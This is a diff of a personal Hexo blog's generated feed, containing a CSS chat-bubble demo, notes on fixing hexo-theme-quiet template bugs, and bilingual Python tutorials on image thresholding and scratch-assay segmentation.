    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    .chat_box {
    display: grid;
    padding: 15px 10px;
    margin: 5px 0;
    transition: background-color 0.5s ease-in-out;
    }

    .left,
    .weixin,
    .qq {
    position: relative;
    max-width: min(400px, 75%);
    padding: 8px 10px;
    margin: 8px 0;
    border-radius: 5px;
    word-break: break-all;
    line-height: 24px;
    }

    .left {
    justify-self: left;
    left: 20px;
    }

    .weixin,
    .qq {
    justify-self: end;
    right: 20px;
    }

    .weixin {
    background-color: #9EEA6A;
    }

    .qq {
    background-color: #1E6EFF;
    color: #FFF;
    }

    .left::before,
    .weixin::before,
    .qq::before {
    content: '';
    position: absolute;
    top: 10px;
    width: 0;
    height: 0;
    border-style: solid;
    }

    .left::before {
    left: -8px;
    border-width: 8px 10px 8px 0;
    }

    .weixin::before {
    right: -9px;
    border-width: 8px 0 8px 10px;
    }

    .qq::before {
    right: -8px;
    border-width: 8px 0 8px 10px;
    }

    [data-theme='light'] {
    .chat_box {
    background-color: #f5f5f5;
    }

    .left {
    background-color: #FFF;
    }

    .left::before {
    border-color: transparent #fff transparent transparent;
    }

    .weixin::before {
    border-color: transparent transparent transparent #9EEA6A;
    }

    .qq::before {
    border-color: transparent transparent transparent #1E6EFF;
    }
    }

    [data-theme='dark'] {
    .chat_box {
    background-color: #111111;
    }

    .left,
    .weixin,
    .qq {
    color: #d5d5d5;
    }

    .left {
    background-color: #2c2c2c;
    }

    .weixin {
    background-color: #3eb477;
    color: #111111;
    }

    .qq {
    background-color: #2c2c2c;
    }

    .left::before {
    border-color: transparent #2c2c2c transparent transparent;
    }

    .weixin::before {
    border-color: transparent transparent transparent #3eb477;
    }

    .qq::before {
    border-color: transparent transparent transparent #2c2c2c;
    }
    }

    HTML

    1
    2
    3
    4
    5
    <div class="chat_box">
    <div class="left">我会夺取你的灵魂!</div>
    <div class="weixin">哇哦~</div>
    <div class="qq">圣光会制裁你!</div>
    </div>

    测试

    古尔丹 VS 安度因!

    我会夺取你的灵魂!
    哇哦~
    圣光会制裁你!

    这次是你赢了…

    ]]>
    @@ -9138,7 +9138,7 @@ /posts/Diary-%E9%97%BD%E4%BA%86/ -
    ]]>
    +
    ]]>
    @@ -9167,7 +9167,7 @@ /posts/Hexo-%E6%9B%B4%E6%96%B0%E4%BA%86hexo%E4%B8%BB%E9%A2%98/ - 前言

    ​ 主题"hexo-theme-quiet: 🔥A simple, easy to read flat hexo theme. 扁平化简约 Hexo 主题"更新了!现在我的博客有了新的改进!在此对该主题的作者表示感谢!

    ​ 同时我觉得这个主题还有一定问题, 记录一下并尝试自己解决。

    gif

    正文

    文章评论功能

    png

    ​ 这个功能要你自己创建一个 OAuth application…

    ​ 大部分文章因为标题太长, 留言板功能会出现 Error: Validation Failed. , 有空再修 orz看下面这个文章, 使用 MD5 解决了, 真机智啊!

    css 的优化, 界面的更新

    png

    ​ 这个表格看起来清爽多了!

    png

    ​ 我不太喜欢原主题白色背景, 黑色的代码框,于是我瞎鼓捣 css, 改成接近jupyter notebook的风格

    png

    ​ 这个代码居然不换行 orz, 把旧版的jquery.min.js里的内容替换了hljs.min.js里的全部内容, 感觉好多了

    显示图片效果的优化

    png

    ​ 现在显示图片可以一张一张地滚动。

    png

    ​ 显示照片的时候我感觉 100%宽度有点太丰满了?改代码!source\css\public\article_cente.less中修改 img 类:

    img {
    max-width: 80%;
    cursor: pointer;
    margin: 8px auto;
    text-align: center;
    display: flex;
    border-radius: 10px;
    outline: none;
    border: 0;
    }

    ​ 在此谢谢保罗同学😘~

    标签点击跳转失败

    png

    ​ 目前点击推文上的标签会跳转失败, 分析了一下, 是layout\_partial\post_head.ejs中第 34 行:

    <% page.categories.data.map((cat)=>{ %>
    <a href="../../<%- cat.path %>" target="_blank" ><%- cat.name %></a>
    <% }) %>

    cat.path链接错误, 把它改成

    <a href="/categories/<%- cat.name %>" target="_blank" ><%- cat.name %></a>

    我真机智!

    翻页丢失封面

    png

    ​ 不知道是我配置的问题还是原作者没意识到这件事 orz, 翻页会导致所有封面地址错误导致显示不出来.

    ​ ~~我有个感觉很笨的解决方法, ~~把layout\_partial\home.ejs中第 8 行-第 12 行:

    <% if(post.cover){ %>
    <img src="<%= post.cover %>" alt="Quiet">
    <% }else{ %>
    <img src="<%- theme.default_cover %>" alt="Quiet">
    <% } %>

    改为:

    <% if(post.cover){ %>
    <img src="<%= theme.menus.home + post.cover %>" alt="Cover">
    <% }else{ %>
    <img src="<%- theme.default_cover %>" alt="Cover">
    <% } %>

    同理 40 行的那一坨也要改.不过这样会导致localhost载入封面时也要尝试从github载入封面导致浪费流量 orz

    编译错误

    png

    ​ 不知道是哪里导致执行命令hexo g的时候会出错 orz

    ​ 但好像没啥影响?就是看着不爽 orz

    ​ 因为我写网页的技术太菜估计一时半会解决不了 orz

    ​ 既然解决不了就把它删了吧!

    播放音乐

    MoePlayer/hexo-tag-aplayer:在 Hexo 帖子/页面中嵌入播放器 (github.com)

    hexo mathjax 无法渲染

    mathjax.js 被拦截:

    png

    hexo mathjax 无法渲染 - 简书 (jianshu.com) 脚本选择 https…

    tags 只显示 9 个

    照着archive.ejstags.ejs改了一遍…

    <% page.title = __("标签:" + page.tag) %>
    <%- partial('_partial/header',{name:'tags'}) %>
    <%
    var years = {};
    site.posts.sort('date').reverse().forEach(function(post){
    const tags = post.tags;
    if(tags.length < 1) return
    tags.data.map((t)=>{
    if(page.tag === t.name){
    var year = post.date.year()
    if(years[year]===undefined){
    years[year] = [];
    }
    years[year].push(post);
    }
    })
    });
    %>

    <div class="tag">
    <%- partial('_widget/header_body',{message:"文章标签:"+page.tag,icon:theme.headers.tags.icon}) %>
    <div class="tag-content" id="content">
    <div class="tag-content-data">
    <%- partial('_widget/grouping',{data:years,keys:Object.keys(years).reverse()}) %>
    </div>
    </div>
    </div>
    ]]>
    + 前言

    ​ 主题"hexo-theme-quiet: 🔥A simple, easy to read flat hexo theme. 扁平化简约 Hexo 主题"更新了!现在我的博客有了新的改进!在此对该主题的作者表示感谢!

    ​ 同时我觉得这个主题还有一定问题, 记录一下并尝试自己解决。

    gif

    正文

    文章评论功能

    png

    ​ 这个功能要你自己创建一个 OAuth application…

    ​ 大部分文章因为标题太长, 留言板功能会出现 Error: Validation Failed. , 有空再修 orz看下面这个文章, 使用 MD5 解决了, 真机智啊!

    css 的优化, 界面的更新

    png

    ​ 这个表格看起来清爽多了!

    png

    ​ 我不太喜欢原主题白色背景, 黑色的代码框,于是我瞎鼓捣 css, 改成接近jupyter notebook的风格

    png

    ​ 这个代码居然不换行 orz, 把旧版的jquery.min.js里的内容替换了hljs.min.js里的全部内容, 感觉好多了

    显示图片效果的优化

    png

    ​ 现在显示图片可以一张一张地滚动。

    png

    ​ 显示照片的时候我感觉 100%宽度有点太丰满了?改代码!source\css\public\article_cente.less中修改 img 类:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    img {
    max-width: 80%;
    cursor: pointer;
    margin: 8px auto;
    text-align: center;
    display: flex;
    border-radius: 10px;
    outline: none;
    border: 0;
    }

    ​ 在此谢谢保罗同学😘~

    标签点击跳转失败

    png

    ​ 目前点击推文上的标签会跳转失败, 分析了一下, 是layout\_partial\post_head.ejs中第 34 行:

    1
    2
    3
    <% page.categories.data.map((cat)=>{ %>
    <a href="../../<%- cat.path %>" target="_blank" ><%- cat.name %></a>
    <% }) %>

    cat.path链接错误, 把它改成

    1
    <a href="/categories/<%- cat.name %>" target="_blank" ><%- cat.name %></a>

    我真机智!

    翻页丢失封面

    png

    ​ 不知道是我配置的问题还是原作者没意识到这件事 orz, 翻页会导致所有封面地址错误导致显示不出来.

    ​ ~~我有个感觉很笨的解决方法, ~~把layout\_partial\home.ejs中第 8 行-第 12 行:

    1
    2
    3
    4
    5
    <% if(post.cover){ %>
    <img src="<%= post.cover %>" alt="Quiet">
    <% }else{ %>
    <img src="<%- theme.default_cover %>" alt="Quiet">
    <% } %>

    改为:

    1
    2
    3
    4
    5
    <% if(post.cover){ %>
    <img src="<%= theme.menus.home + post.cover %>" alt="Cover">
    <% }else{ %>
    <img src="<%- theme.default_cover %>" alt="Cover">
    <% } %>

    同理 40 行的那一坨也要改.不过这样会导致localhost载入封面时也要尝试从github载入封面导致浪费流量 orz

    编译错误

    png

    ​ 不知道是哪里导致执行命令hexo g的时候会出错 orz

    ​ 但好像没啥影响?就是看着不爽 orz

    ​ 因为我写网页的技术太菜估计一时半会解决不了 orz

    ​ 既然解决不了就把它删了吧!

    播放音乐

    MoePlayer/hexo-tag-aplayer:在 Hexo 帖子/页面中嵌入播放器 (github.com)

    hexo mathjax 无法渲染

    mathjax.js 被拦截:

    png

    hexo mathjax 无法渲染 - 简书 (jianshu.com) 脚本选择 https…

    tags 只显示 9 个

    照着archive.ejstags.ejs改了一遍…

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    <% page.title = __("标签:" + page.tag) %>
    <%- partial('_partial/header',{name:'tags'}) %>
    <%
    var years = {};
    site.posts.sort('date').reverse().forEach(function(post){
    const tags = post.tags;
    if(tags.length < 1) return
    tags.data.map((t)=>{
    if(page.tag === t.name){
    var year = post.date.year()
    if(years[year]===undefined){
    years[year] = [];
    }
    years[year].push(post);
    }
    })
    });
    %>

    <div class="tag">
    <%- partial('_widget/header_body',{message:"文章标签:"+page.tag,icon:theme.headers.tags.icon}) %>
    <div class="tag-content" id="content">
    <div class="tag-content-data">
    <%- partial('_widget/grouping',{data:years,keys:Object.keys(years).reverse()}) %>
    </div>
    </div>
    </div>
    ]]>
    @@ -9192,7 +9192,7 @@ /posts/DIP-Introductory%20python%20tutorials%20for%20image%20processing(51-58)-Image%20Segmentation/ - 正文

    Tutorial 51 - What is image thresholding and segmentation

    What is image segmentation? 什么是图像分割?

    And how is it different than thresholding? 它和阈值法有什么不同?

    Image segmentation is the process of partitioning a digital image into multiple segments(image objects).

    • 图像分割是将一幅数字图像分割成多个段(图像对象)的过程。

    Image thresholding is a simple form of image segmentation, it is a way to create a binary image based on setting a threshold value on the pixel intensity of the original image.

    • 图像阈值分割是图像分割的一种简单形式,它是在原始图像的像素强度上设置一个阈值的基础上创建一个二值图像的方法。

    png

    OpenCV —— 阈值分割(直方图技术法,熵算法,Otsu,自适应阈值算法)

    import cv2
    import matplotlib.pyplot as plt

    img = cv2.imread("images/Osteosarcoma_01.tif", 1)
    plt.imshow(img[:,:,::-1])
    <matplotlib.image.AxesImage at 0x15586e075e0>

    png

    • Separate blue channels as they contain nuclei pixels (DAPI).
      • 分开蓝色通道,因为它们包含核像素(DAPI)。
    blue_channel = img[:,:,0]
    plt.imshow(blue_channel, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bc29a60>

    png

    plt.hist(blue_channel.flat, bins=100, range=(0, 120))
    (array([8.12033e+05, 3.47050e+04, 2.10950e+04, 3.48210e+04, 4.78370e+04,        1.07928e+05, 5.22380e+04, 4.82100e+04, 4.30030e+04, 3.66300e+04,        5.45780e+04, 2.04160e+04, 1.62930e+04, 1.28170e+04, 1.05070e+04,        1.52520e+04, 5.43100e+03, 4.38900e+03, 3.60500e+03, 2.90800e+03,        4.45800e+03, 1.71800e+03, 1.54000e+03, 1.34400e+03, 1.21900e+03,        2.06400e+03, 9.29000e+02, 8.15000e+02, 8.25000e+02, 7.36000e+02,        1.44100e+03, 6.95000e+02, 6.53000e+02, 6.37000e+02, 6.56000e+02,        1.30700e+03, 6.35000e+02, 6.70000e+02, 6.42000e+02, 6.53000e+02,        1.44100e+03, 7.63000e+02, 7.41000e+02, 8.87000e+02, 8.89000e+02,        1.84300e+03, 1.05800e+03, 1.03700e+03, 1.06800e+03, 1.09200e+03,        2.30900e+03, 1.16800e+03, 1.22000e+03, 1.28600e+03, 1.33500e+03,        2.73900e+03, 1.33800e+03, 1.43900e+03, 1.44000e+03, 1.51700e+03,        2.97600e+03, 1.54400e+03, 1.50600e+03, 1.54700e+03, 1.53600e+03,        3.21800e+03, 1.54400e+03, 1.64800e+03, 1.61200e+03, 1.61200e+03,        3.08900e+03, 1.53400e+03, 1.50400e+03, 1.53300e+03, 1.50700e+03,        2.88000e+03, 1.45900e+03, 1.38300e+03, 1.37400e+03, 1.38100e+03,        2.67000e+03, 1.33800e+03, 1.24400e+03, 1.22500e+03, 1.16200e+03,        2.38500e+03, 1.17100e+03, 1.13000e+03, 1.08200e+03, 1.04700e+03,        2.03100e+03, 1.03800e+03, 9.89000e+02, 9.92000e+02, 8.93000e+02,        1.78600e+03, 8.82000e+02, 7.94000e+02, 7.79000e+02, 1.52600e+03]), array([  0. ,   1.2,   2.4,   3.6,   4.8,   6. ,   7.2,   8.4,   9.6,         10.8,  12. ,  13.2,  14.4,  15.6,  16.8,  18. ,  19.2,  20.4,         21.6,  22.8,  24. ,  25.2,  26.4,  27.6,  28.8,  30. ,  31.2,         32.4,  33.6,  34.8,  36. ,  37.2,  38.4,  39.6,  40.8,  42. ,         43.2,  44.4,  45.6,  46.8,  48. ,  49.2,  50.4,  51.6,  52.8,         54. ,  55.2,  56.4,  57.6,  58.8,  60. ,  61.2,  62.4,  63.6,         64.8,  66. ,  67.2,  68.4,  69.6,  70.8,  72. ,  73.2,  74.4,         75.6,  76.8,  78. ,  79.2,  80.4,  81.6,  82.8,  84. ,  85.2,         86.4,  87.6,  88.8,  90. ,  91.2,  92.4,  93.6,  94.8,  96. ,         97.2,  98.4,  99.6, 100.8, 102. , 103.2, 104.4, 105.6, 106.8,        108. , 109.2, 110.4, 111.6, 112.8, 114. , 115.2, 116.4, 117.6,        118.8, 120. ]), <BarContainer object of 100 artists>)

    png

    • Manual thresholding by setting threshold value to numpy array
      • 手动设置阈值
    • After thresholding we will get a binary image.
      • 阈值化后得到二值图像。
    background = (blue_channel <= 40)
    nuclei = (blue_channel > 40)
    plt.imshow(nuclei, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c6bb277f0>

    png

    • Using opencv to perform manual threshold
      • 使用 opencv 执行手动阈值
    • All pixels above 40 will have pixel value 255
      • 所有高于 40 的像素的像素值都是 255
    • Should be exactly same as the above method.
      • 应该与上面的方法完全相同。
    ret1, thresh1 = cv2.threshold(blue_channel, 40, 255, cv2.THRESH_BINARY)
    ret1, thresh1
    (40.0, array([[255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))
    plt.imshow(thresh1, cmap="gray")
    <matplotlib.image.AxesImage at 0x20c00133220>

    png

    AUTO using OTSU

    • Using opencv for otsu based automatic thresholding
      • 使用 opencv 进行基于 otsu 的自动阈值分割
    • Reports a value of 50 as threshold for the nuclei.
      • 报告值 50 作为细胞核的阈值。
    ret2, thresh2 = cv2.threshold(blue_channel, 0, 255, cv2.THRESH_BINARY +  cv2.THRESH_OTSU)
    ret2, thresh2
    (50.0, array([[255, 255,   0, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        [255, 255, 255, ...,   0,   0,   0],        ...,        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0],        [  0,   0,   0, ...,   0,   0,   0]], dtype=uint8))

    numpy.digitize

    • np.digitize needs bins to be defined as an array
      • 需要将这些二进制数据定义为数组
    • So let us convert the threshold value to an array
      • 让我们将阈值转换为一个数组
    • np.digitize assign values 0, 1, 2, 3, … to pixels in each class.
      • np.digitize 赋值 0,1,2,3,… 到每个类中的像素。
    • For binary it wold be 0 and 1.
      • 对于二进制,它是 0 和 1。
    import numpy as np

    regions1 = np.digitize(blue_channel, bins=np.array([ret2]))
    plt.imshow(regions1)
    <matplotlib.image.AxesImage at 0x20c00a05ca0>

    png

    Tutorial 52 - Auto-thresholding for multiple regions _using multi-otsu

    from matplotlib import pyplot as plt
    import numpy as np
    from skimage.filters import threshold_multiotsu
    import cv2
    img = cv2.imread("images/BSE.tif", 0)
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x163340e4e20>

    png

    # .flat returns the flattened numpy array (1D)
    plt.hist(img.flat, bins=100, range=(100, 255))
    (array([ 1503.,  4537.,  3200.,  4608.,  5865.,  7691.,  9625., 25963.,            0., 33377., 18666., 19131., 36722.,     0., 31707., 13031.,        10769.,  8827.,  6923.,  5264.,  7160.,  2595.,  1889.,  1722.,         1539.,  3244.,     0.,  4418.,  3113.,  4053., 11409.,     0.,        16772., 10292., 10680., 11360., 11665., 11160., 19404.,     0.,        14149.,  5101.,  3961.,  4908.,     0.,  2600.,   669.,   518.,          354.,   477.,   172.,   160.,   114.,   126.,   255.,     0.,          267.,   142.,   134.,    87.,   123.,   204.,    84.,   122.,           98.,   104.,   107.,   206.,     0.,   207.,   108.,   116.,          256.,     0.,   244.,   137.,   140.,   138.,   166.,   170.,          383.,   237.,   316.,   343.,   477.,  1422.,     0.,  2259.,         1469.,  1623.,  3926.,     0.,  4171.,  1900.,  1763.,  1432.,         1093.,   809.,  1017.,   603.]), array([100.  , 101.55, 103.1 , 104.65, 106.2 , 107.75, 109.3 , 110.85,        112.4 , 113.95, 115.5 , 117.05, 118.6 , 120.15, 121.7 , 123.25,        124.8 , 126.35, 127.9 , 129.45, 131.  , 132.55, 134.1 , 135.65,        137.2 , 138.75, 140.3 , 141.85, 143.4 , 144.95, 146.5 , 148.05,        149.6 , 151.15, 152.7 , 154.25, 155.8 , 157.35, 158.9 , 160.45,        162.  , 163.55, 165.1 , 166.65, 168.2 , 169.75, 171.3 , 172.85,        174.4 , 175.95, 177.5 , 179.05, 180.6 , 182.15, 183.7 , 185.25,        186.8 , 188.35, 189.9 , 191.45, 193.  , 194.55, 196.1 , 197.65,        199.2 , 200.75, 202.3 , 203.85, 205.4 , 206.95, 208.5 , 210.05,        211.6 , 213.15, 214.7 , 216.25, 217.8 , 219.35, 220.9 , 222.45,        224.  , 225.55, 227.1 , 228.65, 230.2 , 231.75, 233.3 , 234.85,        236.4 , 237.95, 239.5 , 241.05, 242.6 , 244.15, 245.7 , 247.25,        248.8 , 250.35, 251.9 , 253.45, 255.  ]), <BarContainer object of 100 artists>)

    png

    MANUAL 手工阈值分割

    • Can perform manual segmentation but auto works fine
      • 能执行手动分割,但自动工作精细
    region1 = (img >= 0) & (img <75)
    region2 = (img >= 75) & (img <140)
    region3 = (img >= 140) & (img <200)
    region4 = (img >= 200) & (img <=255)
    # Create 3 channel blank image of same size as original
    # 创建 3 通道空白图像,大小与原始图像相同
    all_regions = np.zeros((img.shape[0], img.shape[1], 3))
    all_regions[region1] = (1,0,0) # 红
    all_regions[region2] = (0,1,0) # 绿
    all_regions[region3] = (0,0,1) # 蓝
    all_regions[region4] = (1,1,0) # 黄
    all_regions
    array([[[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       ...,       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]],       [[0., 0., 1.],        [0., 0., 1.],        [0., 0., 1.],        ...,        [0., 1., 0.],        [0., 1., 0.],        [0., 1., 0.]]])
    plt.imshow(all_regions)
    <matplotlib.image.AxesImage at 0x16334046340>

    png

    AUTO 自动

    # Apply multi-Otsu threshold 
    thresholds = threshold_multiotsu(img, classes=4)
    • Digitize (segment) original image into multiple classes.
      • 将原始图像数字化(分割)成多个类。
    • np.digitize assign values 0, 1, 2, 3, … to pixels in each class.

    将原始图像数字化(分割)成多个类。

    regions = np.digitize(img, bins=thresholds)
    plt.imshow(regions)
    <matplotlib.image.AxesImage at 0x163340a6a30>

    png

    segm1 = (regions == 0)
    segm2 = (regions == 1)
    segm3 = (regions == 2)
    segm4 = (regions == 3)

    OpenCV 图像处理之膨胀与腐蚀

    • We can use binary opening and closing operations to clean up.
      • 我们可以使用二进制的膨胀和腐蚀操作来清理。
    • Open takes care of isolated pixels within the window
      • Open 负责处理窗口内的独立像素
    • Closing takes care of isolated holes within the defined window
      • 关闭处理已定义窗口内的隔离孔

    png

    from scipy import ndimage as nd

    segm1_opened = nd.binary_opening(segm1, np.ones((3,3)))
    segm1_closed = nd.binary_closing(segm1_opened, np.ones((3,3)))

    segm2_opened = nd.binary_opening(segm2, np.ones((3,3)))
    segm2_closed = nd.binary_closing(segm2_opened, np.ones((3,3)))

    segm3_opened = nd.binary_opening(segm3, np.ones((3,3)))
    segm3_closed = nd.binary_closing(segm3_opened, np.ones((3,3)))

    segm4_opened = nd.binary_opening(segm4, np.ones((3,3)))
    segm4_closed = nd.binary_closing(segm4_opened, np.ones((3,3)))

    all_segments_cleaned = np.zeros((img.shape[0], img.shape[1], 3))

    all_segments_cleaned[segm1_closed] = (1,0,0)
    all_segments_cleaned[segm2_closed] = (0,1,0)
    all_segments_cleaned[segm3_closed] = (0,0,1)
    all_segments_cleaned[segm4_closed] = (1,1,0)

    plt.imshow(all_segments_cleaned) # All the noise should be cleaned now
    <matplotlib.image.AxesImage at 0x1633505ba00>

    png

    Tutorial 53 - Using texture to segment images -demo in python

    • Variance - excerptation of the squared deviation of a random variable from its mean.Could be a good indicator of texture.

      • 方差 -一个随机变量的方差的平均值的例外。可能是 Texture 的好指标。
    • Entropy - quantifies disorder - a very good metric to quantify texture

      • -量化无序-一个非常好的量化纹理的度量

    Gabor convolutional kernal - Gabor 卷积核

    $$g(x,y,\lambda,\theta,\psi,\sigma,\gamma)=\exp\left(-\frac{x’2+\gamma2y’2}{2\sigma2}\right)\cos\left(2\pi\frac{x’}{\lambda+\psi}\right)$$

    其中:

    $x’=x\cos(\theta)+y\sin(\theta)$

    $y’=-x\sin(\theta)+y\cos(\theta)$

    import matplotlib.pyplot as plt
    from skimage import io
    import numpy as np
    from skimage.filters import threshold_otsu
    import cv2
    img = io.imread("images/Scratch0.jpg", as_gray=True)
    plt.imshow(img, cmap="gray")
    <matplotlib.image.AxesImage at 0x22ee31fc790>

    png

    • Variance - not a great way to quantify texture

      • 方差 -不是一个量化纹理的好方法
    from scipy import ndimage 

    k = 7
    img_mean = ndimage.uniform_filter(img, (k, k))
    img_sqr_mean = ndimage.uniform_filter(img ** 2, (k, k))
    img_var = img_sqr_mean - img_mean ** 2
    plt.imshow(img_var, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37a4d90>

    png

    论文阅读:Gabor Convolutional Networks_OopsZero 的博客-CSDN 博客_gabor 卷积

    • GABOR - A great filter for texture but usually efficient.

      • GABOR -一个很好的纹理过滤器,但通常是有效的。
    • if we know exact parameters. Good choice for generating features for machine learning

      • 如果我们知道精确的参数。为机器学习生成特征的好选择。
    ksize = 45
    theta = np.pi / 4
    kernel = cv2.getGaborKernel((ksize, ksize), 5.0, theta, 10.0, 0.9, 0, ktype=cv2.CV_32F)
    filtered_image = cv2.filter2D(img, cv2.CV_8UC3, kernel)
    plt.imshow(filtered_image, cmap='gray')
    <matplotlib.image.AxesImage at 0x22ee37d7430>

    png

    • Entropy: Entropy quantifies disorder.

      • : 熵量化无序。
    • Since cell region has high variation in pixel values the entropy would be higher compared to scratch region

      • 由于细胞区域的像素值变化较大,熵值将高于划痕区域
    from skimage.filters.rank import entropy
    from skimage.morphology import disk

    entropy_img = entropy(img, disk(3))
    plt.imshow(entropy_img)
    <matplotlib.image.AxesImage at 0x22ee39d3d60>

    png

    • Scratch Analysis - single image

      • 划痕分析 -单幅图像
    • Now let us use otsu to threshold high vs low entropy regions.

      • 现在让我们用 otsu 来阈值高熵区和低熵区。
    plt.hist(entropy_img.flat, bins=100, range=(0,5))  #.flat returns the flattened numpy array (1D)
    (array([2.4906e+04, 0.0000e+00, 0.0000e+00, 0.0000e+00, 1.2640e+03,        4.0000e+00, 1.1000e+01, 3.4300e+02, 5.5700e+02, 1.0300e+02,        5.0000e+00, 6.8000e+02, 1.1500e+02, 3.4200e+02, 3.2900e+02,        3.1000e+02, 4.3700e+02, 1.9700e+02, 5.8100e+02, 1.6200e+02,        7.0100e+02, 1.4600e+02, 7.9900e+02, 2.1600e+02, 8.2000e+02,        4.6400e+02, 8.6300e+02, 6.2200e+02, 6.5100e+02, 7.2900e+02,        9.3500e+02, 1.0210e+03, 1.0650e+03, 1.1500e+03, 1.3230e+03,        1.5200e+03, 1.7200e+03, 1.9000e+03, 1.9490e+03, 2.6150e+03,        2.2130e+03, 3.0250e+03, 2.5620e+03, 3.1800e+03, 3.1780e+03,        3.2440e+03, 3.6230e+03, 3.3250e+03, 3.3660e+03, 3.5170e+03,        3.1100e+03, 3.3400e+03, 2.7800e+03, 2.6460e+03, 2.6750e+03,        2.0790e+03, 2.3660e+03, 1.8520e+03, 1.6350e+03, 1.5170e+03,        1.2040e+03, 1.1810e+03, 9.1000e+02, 8.3300e+02, 7.9300e+02,        6.5600e+02, 5.7100e+02, 4.1800e+02, 4.1400e+02, 3.6200e+02,        2.7300e+02, 2.2500e+02, 2.0900e+02, 1.8400e+02, 1.5600e+02,        1.0200e+02, 7.1000e+01, 5.7000e+01, 6.6000e+01, 3.2000e+01,        3.2000e+01, 2.0000e+01, 1.7000e+01, 5.0000e+00, 1.2000e+01,        2.0000e+00, 5.0000e+00, 2.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,        0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]), array([0.  , 0.05, 0.1 , 0.15, 0.2 , 0.25, 0.3 , 0.35, 0.4 , 0.45, 0.5 ,        0.55, 0.6 , 0.65, 0.7 , 0.75, 0.8 , 0.85, 0.9 , 0.95, 1.  , 1.05,        1.1 , 1.15, 1.2 , 1.25, 1.3 , 1.35, 1.4 , 1.45, 1.5 , 1.55, 1.6 ,        1.65, 1.7 , 1.75, 1.8 , 1.85, 1.9 , 1.95, 2.  , 2.05, 2.1 , 2.15,        2.2 , 2.25, 2.3 , 2.35, 2.4 , 2.45, 2.5 , 2.55, 2.6 , 2.65, 2.7 ,        2.75, 2.8 , 2.85, 2.9 , 2.95, 3.  , 3.05, 3.1 , 3.15, 3.2 , 3.25,        3.3 , 3.35, 3.4 , 3.45, 3.5 , 3.55, 3.6 , 3.65, 3.7 , 3.75, 3.8 ,        3.85, 3.9 , 3.95, 4.  , 4.05, 4.1 , 4.15, 4.2 , 4.25, 4.3 , 4.35,        4.4 , 4.45, 4.5 , 4.55, 4.6 , 4.65, 4.7 , 4.75, 4.8 , 4.85, 4.9 ,        4.95, 5.  ]), <BarContainer object of 100 artists>)

    png

    • Now let us binarize the entropy image
      • 现在我们把熵图像二值化
    thresh = threshold_otsu(entropy_img)
    thresh
    1.2953342370696572
    binary = entropy_img <= thresh
    plt.imshow(binary)
    <matplotlib.image.AxesImage at 0x22ee3ab2280>

    png

    # Sum all pixels in the scratch region (values =1)
    scratch_area = np.sum(binary == 1)
    print("Scratched area is: ", scratch_area, "Square pixels")

    scale = 0.45 # microns / pixel
    print("Scratched area in sq. microns is: ", scratch_area*((scale)**2), "Square pixels")
    Scratched area is:  33485 Square pixelsScratched area in sq. microns is:  6780.712500000001 Square pixels

    Tutorial 54 - Scratch assay analysis in python by using texture for segmentation

    What is scratch assay (wound healing) analysis? 什么是划痕分析(伤口愈合)?

    • The wound healing assay is a standard technique for probing collective cell migration in two dimensions.

      • 伤口愈合试验是一种标准的技术,用于探测细胞在二维上的集体迁移。
    • A monolayer of cells scratched with a pipette tip.

      • 用移液管尖划破的单层细胞。
    • The migration of cells into the gap imaged over several hours using a microscope.

      • 用显微镜在几个小时内拍摄到细胞进入缝隙的迁移过程。
    • The primary information derived is the rate of gap closure → a measure of the speed of the collective motion of the cells.

      • 得到的主要信息是间隙闭合率→细胞集体运动速度的度量。

    png


    • Scratch Assay on time series images
      • 时间序列图像划痕分析
    import matplotlib.pyplot as plt
    from skimage import io
    from skimage.filters.rank import entropy
    from skimage.morphology import disk
    import numpy as np
    from skimage.filters import threshold_otsu
    • Use glob to extract image names and load them.
      • 使用glob提取图像名称并加载它们。
    import glob
    time = 0
    scale = 0.45 # microns/pixel
    time_list = []
    area_list = []
    path = "images/scratch_assay/*.*"
    • Put the code from single image segmentation in a for loop to apply segmentaion to all images
      • 将来自单个图像分割的代码放入for循环中,将分割应用于所有图像
    for file in glob.glob(path):
    img=io.imread(file)
    entropy_img = entropy(img, disk(3))
    thresh = threshold_otsu(entropy_img)
    binary = entropy_img <= thresh
    scratch_area = np.sum(binary == 1)
    scratch_area = scratch_area * ((scale) ** 2) # Convert to microns from pixel units
    print("time=", time, "hr ", "Scratch area=", scratch_area, "um\N{SUPERSCRIPT TWO}")
    time_list.append(time)
    area_list.append(scratch_area)
    time += 1
